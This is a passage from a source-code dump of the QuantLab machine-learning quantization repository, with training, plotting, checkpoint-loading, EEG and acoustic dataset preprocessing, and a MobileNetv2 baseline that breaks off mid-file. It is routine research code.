logbook.writer.add_scalar('learning_rate', opt.param_groups[0]['lr'], global_step=logbook.i_epoch)\n return stats\n\n\ndef test(logbook, net, device, loss_fn, test_l, valid=False, prefix=None):\n \"\"\"Run a validation epoch.\"\"\"\n logbook.meter.reset()\n bar_title = 'Validation \\t' if valid else 'Test \\t'\n bar = FillingSquaresBar(bar_title, max=len(test_l))\n with torch.no_grad():\n for i_batch, data in enumerate(test_l):\n \n # load data onto device\n inputs, gt_labels = data\n inputs = inputs.to(device)\n gt_labels = gt_labels.to(device)\n \n # forprop\n tensor_stats, pr_outs = net.forward_with_tensor_stats(inputs)\n loss = loss_fn(pr_outs, gt_labels)\n \n # update statistics\n logbook.meter.update(pr_outs, gt_labels, loss.item(), track_metric=True)\n bar.suffix = 'Total: {total:} | ETA: {eta:} | Epoch: {epoch:4d} | ({batch:5d}/{num_batches:5d})'.format(\n total=bar.elapsed_td,\n eta=bar.eta_td,\n epoch=logbook.i_epoch,\n batch=i_batch + 1,\n num_batches=len(test_l))\n bar.suffix = bar.suffix + logbook.meter.bar()\n bar.next()\n bar.finish()\n\n if prefix == None: \n prefix = 'valid' if valid else 'test'\n stats = {\n prefix+'_loss': logbook.meter.avg_loss,\n prefix+'_metric': logbook.meter.avg_metric\n }\n if valid:\n for k, v in stats.items():\n if v:\n logbook.writer.add_scalar(k, v, global_step=logbook.i_epoch)\n for name, tensor in tensor_stats:\n logbook.writer.add_histogram(name, tensor, global_step=logbook.i_epoch)\n return stats\n" }, { "alpha_fraction": 0.6031042337417603, "alphanum_fraction": 0.6082779169082642, "avg_line_length": 33.91613006591797, "blob_id": "9007640e0872b7926ea8b8cd8e1fa8909bae955d", "content_id": "5007ebf2f58affe1f2a11613f9073256c8d4bb3f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5412, "license_type": "permissive", "max_line_length": 101, "num_lines": 155, "path": "/plot_npz_tb.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "import os\nimport numpy as np\nimport argparse\nimport matplotlib.pyplot as plt\n\n\ndef plot_npz(filename, export=None, act_quant_line=None):\n data = dict(np.load(filename))\n if 'num_trials' in data:\n del data['num_trials']\n plot_data(data, export, act_quant_line)\n\n\ndef plot_tb(filename, export=None, act_quant_line=None):\n from eegnet_run import _prepare_scalar_array_from_tensorboard as prepare_tb_array\n from tensorboard.backend.event_processing.event_accumulator import EventAccumulator\n ea = EventAccumulator(filename)\n ea.Reload()\n data = {key: prepare_tb_array(ea, 
key) for key in ea.Tags()['scalars']}\n plot_data(data, export, act_quant_line)\n\n\ndef plot_data(data, export=None, act_quant_line=None):\n # decide for each key to which plot it should belong\n loss_plot = {}\n acc_plot = {}\n\n n_epochs = None\n\n for name, array in data.items():\n if n_epochs is None:\n n_epochs = len(array)\n else:\n assert len(array) == n_epochs, f\"{name} has length {len(array)} but should be {n_epochs}\"\n\n l_name = name.lower()\n if 'metric' in l_name or 'acc' in l_name or 'accuracy' in l_name:\n acc_plot[name] = array\n elif 'loss' in l_name:\n loss_plot[name] = array\n elif l_name == 'learning_rate':\n pass\n else:\n # ask user to which plot it should be added\n choice = input(f\"Where to put {name}? [b]oth, [l]oss, [a]ccuracy, [N]one? > \")\n choice = choice.lower() if choice else 'n'\n assert choice in ['b', 'l', 'a', 'n']\n if choice in ['b', 'l']:\n loss_plot[name] = array\n if choice in ['b', 'a']:\n acc_plot[name] = array\n\n generate_figure(loss_plot, acc_plot, n_epochs, export, act_quant_line)\n\n\ndef generate_figure(loss_plot, acc_plot, n_epochs, export=None, act_quant_line=None):\n\n # make sure that the environment variables are set (to hide the unnecessary output)\n if \"XDG_RUNTIME_DIR\" not in os.environ:\n tmp_dir = \"/tmp/runtime-eegnet\"\n os.environ[\"XDG_RUNTIME_DIR\"] = tmp_dir\n if not os.path.exists(tmp_dir):\n os.makedirs(tmp_dir)\n os.chmod(tmp_dir, 700)\n\n # prepare data\n x = np.array(range(1, n_epochs + 1))\n\n # prepare the plot\n fig = plt.figure(figsize=(20, 10))\n\n # do loss figure\n loss_subfig = fig.add_subplot(121)\n add_subplot(loss_plot, x, loss_subfig, \"Loss\", \"upper center\", act_quant_line)\n\n # do accuracy figure\n acc_subfig = fig.add_subplot(122)\n add_subplot(acc_plot, x, acc_subfig, \"Accuracy\", \"lower center\", act_quant_line)\n\n # save the image\n if export is None:\n plt.show()\n else:\n fig.savefig(export, bbox_inches='tight')\n\n # close\n plt.close('all')\n\n\ndef add_subplot(data, x, subfig, title, legend_pos=None, act_quant_line=None):\n plt.grid()\n colors = plt.rcParams['axes.prop_cycle'].by_key()['color']\n\n additional_axis = []\n lines = []\n\n if act_quant_line is not None:\n lines.append(plt.axvline(x=act_quant_line, label='Activation Quantization', color=colors[2]))\n\n for i, key in enumerate(data.keys()):\n if key.startswith('train_'):\n new_lines = subfig.plot(x, data[key], label=key, color=colors[0])\n elif key.startswith('valid_'):\n new_lines = subfig.plot(x, data[key], label=key, color=colors[1])\n else:\n tmp_axis = subfig.twinx()\n tmp_axis.set_ylabel(key)\n new_lines = tmp_axis.plot(x, data[key], label=key, color=colors[i+3])\n additional_axis.append(tmp_axis)\n lines += new_lines\n\n for i, axis in enumerate(additional_axis):\n axis.spines['right'].set_position(('axes', 1 + i * 0.15))\n if i > 0:\n axis.set_frame_on(True)\n axis.patch.set_visible(False)\n\n subfig.set_title(title)\n subfig.set_xlabel(\"Epoch\")\n\n labels = [l.get_label() for l in lines]\n last_ax = additional_axis[-1] if additional_axis else subfig\n last_ax.legend(lines, labels, frameon=True, framealpha=1, facecolor='white', loc=legend_pos)\n\n return len(additional_axis)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('file', help='filename of the data', nargs=1)\n parser.add_argument('-t', '--tensorboard', help='Data is of tensorboard format',\n action='store_true')\n parser.add_argument('-n', '--numpy', help='Data is of numpy npz format',\n action='store_true')\n 
parser.add_argument('-e', '--export', help='export plot to specified file', type=str)\n parser.add_argument('--act_quant_line', help='position of vertical line', type=int)\n\n args = parser.parse_args()\n\n # if both tensorboard and numpy are not set, infer the type by the file ending\n filename = args.file[0]\n if not args.tensorboard and not args.numpy:\n if 'events.out.tfevents' in filename:\n args.tensorboard = True\n elif filename.endswith('.npz'):\n args.numpy = True\n else:\n raise RuntimeError(f'Cannot automatically detect type of the file: {args.file}')\n\n if args.tensorboard:\n plot_tb(filename, args.export, args.act_quant_line)\n elif args.numpy:\n plot_npz(filename, args.export, args.act_quant_line)\n else:\n raise RuntimeError()\n" }, { "alpha_fraction": 0.5378422141075134, "alphanum_fraction": 0.544283390045166, "avg_line_length": 26, "blob_id": "995b60b5dfb96b3088a2a36ded540a88688d4d19", "content_id": "c522e2d3e617b1c9e0354d8c10763c84ca060b2f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 621, "license_type": "permissive", "max_line_length": 66, "num_lines": 23, "path": "/quantlab/indiv/__init__.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nclass Controller(object):\n def __init__(self):\n pass\n \n def step(self, epoch, optimizer=None, tensorboardWriter=None):\n pass\n \n def step_preTraining(self, *args, **kwargs):\n self.step(*args, **kwargs)\n \n def step_preValidation(self, *args, **kwargs):\n pass\n \n def step_postOptimStep(self, *args, **kwargs):\n pass\n \n @staticmethod\n def getControllers(net):\n return [v for m in net.modules() \n for v in m.__dict__.values() \n if isinstance(v, Controller)]\n" }, { "alpha_fraction": 0.5976851582527161, "alphanum_fraction": 0.6032407283782959, "avg_line_length": 39, "blob_id": "2669a847e40478b554fa267a86ff07a48499a21e", "content_id": "e6e4524cb7965771df8c2b36697249e3306e5687", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2160, "license_type": "permissive", "max_line_length": 131, "num_lines": 54, "path": "/quantlab/indiv/transfer.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport os\nimport torch\n\nfrom quantlab.protocol.logbook import _exp_align_, _ckpt_align_\n\n\ndef load_pretrained(logbook, net):\n \n #get path to pretrained network\n pre_config = logbook.config['indiv']['net']['pretrained']\n if isinstance(pre_config['file'], str):\n ckpt_file = os.path.join(os.path.dirname(logbook.dir_logs), logbook.topology, 'pretrained', pre_config['file'])\n if not os.path.exists(ckpt_file):\n ckpt_file = pre_config['file']\n elif isinstance(pre_config['file'], dict):\n dir_exp = 'exp' + str(pre_config['file']['exp_id']).rjust(_exp_align_, '0')\n epoch_str = str(pre_config['file']['epoch'])\n if epoch_str.isnumeric():\n ckpt_id = epoch_str.rjust(_ckpt_align_, '0')\n ckpt_name = 'epoch' + ckpt_id + '.ckpt'\n else: \n #e.g. 
for 'best', 'last'\n ckpt_name = epoch_str + '.ckpt'\n ckpt_file = os.path.join(logbook.dir_logs, dir_exp, 'saves', ckpt_name)\n if logbook.verbose:\n print('Loading checkpoint: {}'.format(ckpt_file))\n \n #load network params\n net_dict = net.state_dict()\n pretrained_dict = torch.load(ckpt_file)['indiv']['net']\n if 'parameters' in pre_config.keys():\n #load selected parameters\n parameters = []\n for group_name in pre_config['parameters']:\n parameters += [k for k in pretrained_dict.keys() if k.startswith(group_name) and not k.endswith('num_batches_tracked')]\n net_dict.update({k: v for k, v in pretrained_dict.items() if k in parameters})\n else:\n #load all parameters if not specified\n net_dict = pretrained_dict \n \n missing_keys, unexpected_keys = net.load_state_dict(net_dict, strict=False)\n \n #report differences\n if len(missing_keys) > 0:\n print('WARNING: missing keys in pretrained net!')\n for k in missing_keys:\n print('key: %s' % k)\n if len(unexpected_keys) > 0:\n print('WARNING: unexpected keys in pretrained net!')\n for k in unexpected_keys:\n print('key: %s' % k)\n" }, { "alpha_fraction": 0.6203840374946594, "alphanum_fraction": 0.6474642753601074, "avg_line_length": 32.295082092285156, "blob_id": "2a8153debb4f24c11c525a31e4e35a2f3d15a4e8", "content_id": "eed531b64f3cd590028c48c317c07138a929fcd3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2031, "license_type": "permissive", "max_line_length": 78, "num_lines": 61, "path": "/quantlab/ETHZ-CVL-AED/MeyerNet/acousticEventDetDatasetConvert.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport numpy as np\nimport re\nimport os\nimport pickle\n\ndef readSingleFile(fname):\n with open(fname) as f:\n fileCont = f.read()\n arrs = re.findall('array\\(\\[(.*)\\]\\)', fileCont)\n arrs = [np.fromstring(a, sep=',', dtype=np.int16) for a in arrs]\n# print('fname: %s' % fname)\n# print([t.shape for t in arrs])\n arrs = [t.reshape(64,-1) for t in arrs] #shape: n_t x 64\n \n #sum of lengths: 8*60+48+52 = 580\n #'normal' size: 400 --> overlap of 10 on both sides (or 20 on one)\n arrsConcat = [arrs[0]] + [t[:,20:] for t in arrs[1:]]\n spectrogram = np.concatenate(arrsConcat, axis=1)\n return spectrogram #64 x 25600\n\ndef getClasses(rootDir):\n filelist = os.listdir(rootDir) \n # regex for format {className}_{someNum}_{randomString}.csv to parse class\n classes = (re.findall('^(.*)\\_\\d*_.*.csv$', fname) for fname in filelist)\n classes = filter(lambda s: len(s) >= 1, classes)\n classes = (s[0] for s in classes)\n classes = list(set(classes)) # uniquify\n return classes\n\ndef readClassSpectrograms(cl, rootDir):\n filelist = os.listdir(rootDir)\n clFiles = (re.findall('^(%s_.*.csv)$' % cl, fname) for fname in filelist)\n clFiles = filter(lambda s: len(s) >= 1, clFiles)\n clFiles = (rootDir + s[0] for s in clFiles)\n clSpectrograms = [readSingleFile(fname) for fname in clFiles]\n return clSpectrograms\n\n\n#readSingleFile('./test/car_172_offset25.csv')\n#readSingleFile('./test/car_172_offset50.csv')\n\n\n\nclasses = getClasses('./train/')\nprint('classes: %s' % str(classes))\ndatasetTrain = {cl: readClassSpectrograms(cl, './train/') for cl in classes}\ndatasetTest = {cl: readClassSpectrograms(cl, './test/') for cl in classes}\n\nfname = './train.pickle'\nwith open(fname, 'wb') as f:\n pickle.dump(datasetTrain, f)\nfname = './test.pickle'\nwith open(fname, 'wb') as f:\n 
pickle.dump(datasetTest, f)\n\n\n#import matplotlib.pyplot as plt\n#spectrogram = datasetTrain['acoustic_guitar'][3]\n#plt.imshow(spectrogram)\n" }, { "alpha_fraction": 0.5598063468933105, "alphanum_fraction": 0.5768269896507263, "avg_line_length": 30.86069679260254, "blob_id": "69a8efdfca191a8f0b0dbca17d84cbd4296f7267", "content_id": "622419ef099e5205952c18d67f37969fdf454f76", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6404, "license_type": "permissive", "max_line_length": 125, "num_lines": 201, "path": "/quantlab/BCI-CompIV-2a/EEGNet/preprocess.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani, Tibor Schneider\n\nfrom os import path\n\nimport numpy as np\nimport scipy.io as sio\nfrom scipy.signal import butter, sosfilt\nimport numpy as np\nimport torch as t\nfrom torchvision.transforms import ToTensor, Normalize, Compose\n\nfrom quantlab.treat.data.split import transform_random_split\n\n\n\"\"\"\nIn order to use this preprocessing module, use the following 'data' configuration\n\n\"data\": {\n \"subject\": 1\n \"fs\": 250,\n \"f1_fraction\": 1.5,\n \"f2_fraction\": 6.0,\n \"filter\": {\n # SEE BELOW\n }\n \"valid_fraction\": 0.1,\n \"bs_train\": 32,\n \"bs_valid\": 32,\n \"use_test_as_valid\": false\n}\n\nFor using no filter, you can leave out the \"data\".\"filter\" object, or set the \"data\".filter\".\"type\"\nto \"none\".\n\nFor using highpass, use the following filter\n\"filter\": {\n \"type\": \"highpass\",\n \"fc\": 4.0,\n \"order\": 4\n}\n\nFor using bandpass, use the following filter\n\"filter\": {\n \"type\": \"bandpass\",\n \"fc_low\": 4.0,\n \"fc_high\": 40.0,\n \"order\": 5\n}\n\"\"\"\n\n\nclass BCI_CompIV_2a(t.utils.data.Dataset):\n\n def __init__(self, root, train, subject, transform=None):\n self.subject = subject\n self.root = root\n self.train = train\n self.transform = transform\n self.samples, self.labels = self._load_data()\n\n def __len__(self):\n return len(self.samples)\n\n def __getitem__(self, idx):\n sample = self.samples[idx, :, :]\n label = self.labels[idx]\n if self.transform:\n sample = self.transform(sample)\n return sample, label\n\n def _load_data(self):\n NO_channels = 22\n NO_tests = 6 * 48\n Window_Length = 7 * 250\n\n class_return = np.zeros(NO_tests, dtype=np.float32)\n data_return = np.zeros((NO_tests, NO_channels, Window_Length), dtype=np.float32)\n\n n_valid_trials = 0\n if self.train:\n a = sio.loadmat(path.join(self.root, 'A0' + str(self.subject) + 'T.mat'))\n else:\n a = sio.loadmat(path.join(self.root, 'A0' + str(self.subject) + 'E.mat'))\n a_data = a['data']\n for ii in range(0, a_data.size):\n a_data1 = a_data[0, ii]\n a_data2 = [a_data1[0, 0]]\n a_data3 = a_data2[0]\n a_X = a_data3[0]\n a_trial = a_data3[1]\n a_y = a_data3[2]\n a_fs = a_data3[3]\n # a_classes = a_data3[4]\n a_artifacts = a_data3[5]\n # a_gender = a_data3[6]\n # a_age = a_data3[7]\n\n for trial in range(0, a_trial.size):\n if a_artifacts[trial] == 0:\n range_a = int(a_trial[trial])\n range_b = range_a + Window_Length\n data_return[n_valid_trials, :, :] = np.transpose(a_X[range_a:range_b, :22])\n class_return[n_valid_trials] = int(a_y[trial])\n n_valid_trials += 1\n\n data_return = data_return[0:n_valid_trials, :, :]\n class_return = class_return[0:n_valid_trials]\n\n class_return = class_return - 1\n\n data_return = t.Tensor(data_return).to(dtype=t.float)\n class_return = t.Tensor(class_return).to(dtype=t.long)\n\n return 
data_return, class_return\n\n\nclass HighpassFilter(object):\n\n def __init__(self, fs, fc, order):\n nyq = 0.5 * fs\n norm_fc = fc / nyq\n self.sos = butter(order, norm_fc, btype='highpass', output='sos')\n\n def __call__(self, sample):\n for ch in sample.shape[0]:\n sample[ch, :] = sosfilt(self.sos, sample[ch, :])\n return sample\n\n\nclass BandpassFilter(object):\n\n def __init__(self, fs, fc_low, fc_high, order):\n nyq = 0.5 * fs\n norm_fc_low = fc_low / nyq\n norm_fc_high = fc_high / nyq\n self.sos = butter(order, [norm_fc_low, norm_fc_high], btype='bandpass', output='sos')\n\n def __call__(self, sample):\n for ch in sample.shape[0]:\n sample[ch, :] = sosfilt(self.sos, sample[ch, :])\n return sample\n\n\nclass Identity(object):\n\n def __call__(self, sample):\n return sample\n\n\nclass TimeWindowPostCue(object):\n\n def __init__(self, fs, t1_factor, t2_factor):\n self.t1 = int(t1_factor * fs)\n self.t2 = int(t2_factor * fs)\n\n def __call__(self, sample):\n return sample[:, :, self.t1:self.t2]\n\n\nclass ReshapeTensor(object):\n def __call__(self, sample):\n return sample.view(1, sample.shape[0], sample.shape[1])\n\n\ndef get_transform(fs, t1_factor, t2_factor, filter_config):\n # make sure that filter_config exists\n if filter_config is None:\n filter_config = {'type': None}\n elif 'type' not in filter_config:\n filter_config['type'] = 'none'\n\n if filter_config['type'] == 'highpass':\n filter_transform = HighpassFilter(fs, filter_config['fc'], filter_config['order'])\n elif filter_config['type'] == 'bandpass':\n filter_transform = BandpassFilter(fs, filter_config['fc_low'], filter_config['fc_high'],\n filter_config['order'])\n else:\n filter_transform = Identity()\n\n return Compose([filter_transform,\n ReshapeTensor(),\n TimeWindowPostCue(fs, t1_factor, t2_factor)])\n\n\ndef load_data_sets(dir_data, data_config):\n transform = get_transform(data_config['fs'], data_config['t1_factor'],\n data_config['t2_factor'], data_config['filter'])\n trainvalid_set = BCI_CompIV_2a(root=dir_data, train=True, subject=data_config['subject'])\n if data_config.get(\"use_test_as_valid\", False):\n # use the test set as the validation set\n train_set = trainvalid_set\n train_set.transform = transform\n valid_set = BCI_CompIV_2a(root=dir_data, train=False, subject=data_config['subject'], transform=transform)\n test_set = BCI_CompIV_2a(root=dir_data, train=False, subject=data_config['subject'], transform=transform)\n else:\n # split train set into train and validation set\n len_train = int(len(trainvalid_set) * (1.0 - data_config['valid_fraction']))\n train_set, valid_set = transform_random_split(trainvalid_set, [len_train, len(trainvalid_set) - len_train],\n [transform, transform])\n test_set = BCI_CompIV_2a(root=dir_data, train=False, subject=data_config['subject'], transform=transform)\n return train_set, valid_set, test_set\n" }, { "alpha_fraction": 0.8211382031440735, "alphanum_fraction": 0.8211382031440735, "avg_line_length": 29.75, "blob_id": "0733cdb873686f9a2a8522de58d51e709aa632e2", "content_id": "49b48b55882238b2f7543eb3ab02af02d4735436", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 123, "license_type": "permissive", "max_line_length": 55, "num_lines": 4, "path": "/quantlab/ImageNet/ResNet/__init__.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "from .preprocess import load_data_sets\nfrom .postprocess import postprocess_pr, postprocess_gt\n\nfrom .resnet import ResNet\n" }, { "alpha_fraction": 
0.4952325224876404, "alphanum_fraction": 0.5608072280883789, "avg_line_length": 43.173126220703125, "blob_id": "186d03dd37fec0246b9686f74255a71287e0f975", "content_id": "8461933b6858f1f9365916e27febc8d32d26874e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17095, "license_type": "permissive", "max_line_length": 102, "num_lines": 387, "path": "/quantlab/ImageNet/MobileNetv2/mobilenetv2baseline.py", "repo_name": "xiaywang/QuantLab", "src_encoding": "UTF-8", "text": "# Copyright (c) 2019 UniMoRe, Matteo Spallanzani\n# Copyright (c) 2019 ETH Zurich, Lukas Cavigelli\n\nimport math\nimport torch.nn as nn\n\n\n# In order for the baselines to be launched with the same logic as quantized\n# models, an empty quantization scheme and an empty thermostat schedule need\n# to be configured.\n# Use the following templates for the `net` and `thermostat` configurations:\n#\n# \"net\": {\n# \"class\": \"MobileNetv2Baseline\",\n# \"params\": {\"capacity\": 1, \"expansion\": 6},\n# \"pretrained\": null,\n# \"loss_fn\": {\n# \"class\": \"CrossEntropyLoss\",\n# \"params\": {}\n# }\n# }\n#\n# \"thermostat\": {\n# \"class\": \"MobileNetv2Baseline\",\n# \"params\": {\n# \"noise_schemes\": {},\n# \"bindings\": []\n# }\n# }\n\nclass MobileNetv2Baseline(nn.Module):\n \"\"\"MobileNetv2 Convolutional Neural Network.\"\"\"\n def __init__(self, capacity=1, expansion=6):\n super().__init__()\n c0 = 3\n t0 = int(32 * capacity) * 1\n c1 = int(16 * capacity)\n t1 = c1 * expansion\n c2 = int(24 * capacity)\n t2 = c2 * expansion\n c3 = int(32 * capacity)\n t3 = c3 * expansion\n c4 = int(64 * capacity)\n t4 = c4 * expansion\n c5 = int(96 * capacity)\n t5 = c5 * expansion\n c6 = int(160 * capacity)\n t6 = c6 * expansion\n c7 = int(320 * capacity)\n c8 = max(int(1280 * capacity), 1280)\n # first block\n self.phi01_conv = nn.Conv2d(c0, t0, kernel_size=3, stride=2, padding=1, bias=False)\n self.phi01_bn = nn.BatchNorm2d(t0)\n self.phi01_act = nn.ReLU6(inplace=True)\n self.phi02_conv = nn.Conv2d(t0, t0, kernel_size=3, stride=1, padding=1, groups=t0, bias=False)\n self.phi02_bn = nn.BatchNorm2d(t0)\n self.phi02_act = nn.ReLU6(inplace=True)\n self.phi03_conv = nn.Conv2d(t0, c1, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi03_bn = nn.BatchNorm2d(c1)\n # second block\n self.phi04_conv = nn.Conv2d(c1, t1, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi04_bn = nn.BatchNorm2d(t1)\n self.phi04_act = nn.ReLU6(inplace=True)\n self.phi05_conv = nn.Conv2d(t1, t1, kernel_size=3, stride=2, padding=1, groups=t1, bias=False)\n self.phi05_bn = nn.BatchNorm2d(t1)\n self.phi05_act = nn.ReLU6(inplace=True)\n self.phi06_conv = nn.Conv2d(t1, c2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi06_bn = nn.BatchNorm2d(c2)\n self.phi07_conv = nn.Conv2d(c2, t2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi07_bn = nn.BatchNorm2d(t2)\n self.phi07_act = nn.ReLU6(inplace=True)\n self.phi08_conv = nn.Conv2d(t2, t2, kernel_size=3, stride=1, padding=1, groups=t2, bias=False)\n self.phi08_bn = nn.BatchNorm2d(t2)\n self.phi08_act = nn.ReLU6(inplace=True)\n self.phi09_conv = nn.Conv2d(t2, c2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi09_bn = nn.BatchNorm2d(c2)\n # third block\n self.phi10_conv = nn.Conv2d(c2, t2, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi10_bn = nn.BatchNorm2d(t2)\n self.phi10_act = nn.ReLU6(inplace=True)\n self.phi11_conv = nn.Conv2d(t2, t2, kernel_size=3, stride=2, padding=1, groups=t2, 
bias=False)\n self.phi11_bn = nn.BatchNorm2d(t2)\n self.phi11_act = nn.ReLU6(inplace=True)\n self.phi12_conv = nn.Conv2d(t2, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi12_bn = nn.BatchNorm2d(c3)\n self.phi13_conv = nn.Conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi13_bn = nn.BatchNorm2d(t3)\n self.phi13_act = nn.ReLU6(inplace=True)\n self.phi14_conv = nn.Conv2d(t3, t3, kernel_size=3, stride=1, padding=1, groups=t3, bias=False)\n self.phi14_bn = nn.BatchNorm2d(t3)\n self.phi14_act = nn.ReLU6(inplace=True)\n self.phi15_conv = nn.Conv2d(t3, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi15_bn = nn.BatchNorm2d(c3)\n self.phi16_conv = nn.Conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi16_bn = nn.BatchNorm2d(t3)\n self.phi16_act = nn.ReLU6(t3)\n self.phi17_conv = nn.Conv2d(t3, t3, kernel_size=3, stride=1, padding=1, groups=t3, bias=False)\n self.phi17_bn = nn.BatchNorm2d(t3)\n self.phi17_act = nn.ReLU6(inplace=True)\n self.phi18_conv = nn.Conv2d(t3, c3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi18_bn = nn.BatchNorm2d(c3)\n # fourth block\n self.phi19_conv = nn.Conv2d(c3, t3, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi19_bn = nn.BatchNorm2d(t3)\n self.phi19_act = nn.ReLU6(inplace=True)\n self.phi20_conv = nn.Conv2d(t3, t3, kernel_size=3, stride=2, padding=1, groups=t3, bias=False)\n self.phi20_bn = nn.BatchNorm2d(t3)\n self.phi20_act = nn.ReLU6(inplace=True)\n self.phi21_conv = nn.Conv2d(t3, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi21_bn = nn.BatchNorm2d(c4)\n self.phi22_conv = nn.Conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi22_bn = nn.BatchNorm2d(t4)\n self.phi22_act = nn.ReLU6(inplace=True)\n self.phi23_conv = nn.Conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi23_bn = nn.BatchNorm2d(t4)\n self.phi23_act = nn.ReLU6(inplace=True)\n self.phi24_conv = nn.Conv2d(t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi24_bn = nn.BatchNorm2d(c4)\n self.phi25_conv = nn.Conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi25_bn = nn.BatchNorm2d(t4)\n self.phi25_act = nn.ReLU6(inplace=True)\n self.phi26_conv = nn.Conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi26_bn = nn.BatchNorm2d(t4)\n self.phi26_act = nn.ReLU6(inplace=True)\n self.phi27_conv = nn.Conv2d(t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi27_bn = nn.BatchNorm2d(c4)\n self.phi28_conv = nn.Conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi28_bn = nn.BatchNorm2d(t4)\n self.phi28_act = nn.ReLU6(inplace=True)\n self.phi29_conv = nn.Conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi29_bn = nn.BatchNorm2d(t4)\n self.phi29_act = nn.ReLU6(inplace=True)\n self.phi30_conv = nn.Conv2d(t4, c4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi30_bn = nn.BatchNorm2d(c4)\n # fifth block\n self.phi31_conv = nn.Conv2d(c4, t4, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi31_bn = nn.BatchNorm2d(t4)\n self.phi31_act = nn.ReLU6(inplace=True)\n self.phi32_conv = nn.Conv2d(t4, t4, kernel_size=3, stride=1, padding=1, groups=t4, bias=False)\n self.phi32_bn = nn.BatchNorm2d(t4)\n self.phi32_act = nn.ReLU6(inplace=True)\n self.phi33_conv = nn.Conv2d(t4, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi33_bn = nn.BatchNorm2d(c5)\n self.phi34_conv = nn.Conv2d(c5, t5, kernel_size=1, stride=1, 
padding=0, bias=False)\n self.phi34_bn = nn.BatchNorm2d(t5)\n self.phi34_act = nn.ReLU6(inplace=True)\n self.phi35_conv = nn.Conv2d(t5, t5, kernel_size=3, stride=1, padding=1, groups=t5, bias=False)\n self.phi35_bn = nn.BatchNorm2d(t5)\n self.phi35_act = nn.ReLU6(inplace=True)\n self.phi36_conv = nn.Conv2d(t5, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi36_bn = nn.BatchNorm2d(c5)\n self.phi37_conv = nn.Conv2d(c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi37_bn = nn.BatchNorm2d(t5)\n self.phi37_act = nn.ReLU6(inplace=True)\n self.phi38_conv = nn.Conv2d(t5, t5, kernel_size=3, stride=1, padding=1, groups=t5, bias=False)\n self.phi38_bn = nn.BatchNorm2d(t5)\n self.phi38_act = nn.ReLU6(inplace=True)\n self.phi39_conv = nn.Conv2d(t5, c5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi39_bn = nn.BatchNorm2d(c5)\n # sixth block\n self.phi40_conv = nn.Conv2d(c5, t5, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi40_bn = nn.BatchNorm2d(t5)\n self.phi40_act = nn.ReLU6(inplace=True)\n self.phi41_conv = nn.Conv2d(t5, t5, kernel_size=3, stride=2, padding=1, groups=t5, bias=False)\n self.phi41_bn = nn.BatchNorm2d(t5)\n self.phi41_act = nn.ReLU6(inplace=True)\n self.phi42_conv = nn.Conv2d(t5, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi42_bn = nn.BatchNorm2d(c6)\n self.phi43_conv = nn.Conv2d(c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi43_bn = nn.BatchNorm2d(t6)\n self.phi43_act = nn.ReLU6(inplace=True)\n self.phi44_conv = nn.Conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi44_bn = nn.BatchNorm2d(t6)\n self.phi44_act = nn.ReLU6(inplace=True)\n self.phi45_conv = nn.Conv2d(t6, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi45_bn = nn.BatchNorm2d(c6)\n self.phi46_conv = nn.Conv2d(c6, t6, 